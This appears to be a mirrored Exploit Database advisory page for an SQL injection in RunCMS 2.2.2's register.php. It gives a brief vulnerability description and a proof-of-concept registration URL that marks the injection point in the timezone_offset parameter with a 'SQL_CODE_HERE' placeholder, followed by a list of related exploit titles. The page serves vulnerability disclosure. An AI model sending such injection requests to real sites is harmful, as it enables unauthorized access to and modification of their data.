RunCMS 2.2.2 – ‘register.php’ SQL Injection

Exploit Database
108 阅读

作者： High-Tech Bridge SA

日期： 2011-02-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35334/

source: https://www.securityfocus.com/bid/46342/info

RunCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

RunCMS 2.2.2 is vulnerable; other versions may also be affected.

http://www.example.com/register.php?uname=user3&email=user%40test2.com&user_viewemail=0&name=user3&address=nope&zip_code=123&town=nope&user_from=nope&phone=123&user_avatar=blank.gif&timezone_offset=123'SQL_CODE_HERE&url=http%3A%2F%2Fnope&language=english&passw=password&vpassw=password&user_mailok=1&verify_text=&verify_crc=&keystring=368483&op=finish

last Exploits
RunCMS 2.2.2 – ‘register.php’ SQL Injection的更多信息

ispCP Omega 1.0.4 – Remote File Inclusion：
AJ Matrix DNA – SQL Injection：
SonicWALL Aventail SSL-VPN – SQL Injection：
WordPress Plugin WP Symposium 15.1 – ‘get_album_item.php’ SQL Injection：
Logitech Media Server 7.9.0 – ‘favorites’ Cross-Site Scripting：
Gnat-TGP 1.2.20 – Remote File Inclusion：
ImpressPages CMS 3.6 – ‘manage()’ Remote Code Execution：
Employee Record Management System 1.2 – Stored Cross-Site Scripting (XSS)：